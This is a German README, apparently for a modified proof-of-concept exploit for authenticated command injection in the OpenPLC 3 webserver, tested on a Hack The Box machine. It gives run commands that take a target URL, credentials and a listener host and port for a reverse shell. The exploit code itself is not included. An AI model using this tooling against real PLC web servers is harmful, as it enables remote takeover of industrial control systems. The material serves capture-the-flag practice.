
OpenPLC 3 WebServer Authentifizierte Remote-Code-Ausführung.
OpenPLC 3 WebServer Authentifizierte Remote-Code-Ausführung.
Das Vorhandensein von Command Injection im Open PLC Webserver v3 ermöglicht es entfernten Angreifern, beliebigen Code auszuführen. Nur getestet auf der HTB-Maschine Wifinetictwo.htb.
Ich hatte Probleme mit allen Skripten, die die Schwachstelle ausnutzen, vielleicht weil ich Parrot verwende oder wegen meines Browsers. Chromium funktioniert für den Login, mit Firefox hatte ich Login-Probleme, und mit dem Webserver passiert etwas Seltsames bei der POST-Anfrage zum Einloggen. Ich habe das Skript von thewhiteh4t modifiziert. Es gibt Teile (hauptsächlich die Upload-Methode), die einfach kopiert wurden, aber ich habe den Teil geändert, der die Cookies vom Server holt, um den Exploit zu starten.
Der ursprüngliche PoC wird von Fellipe Oliveira bereitgestellt.
Ich hoffe, es hilft dir, wenn du Probleme damit hast.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
Alternativ kannst du exploit.py modifizieren:
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass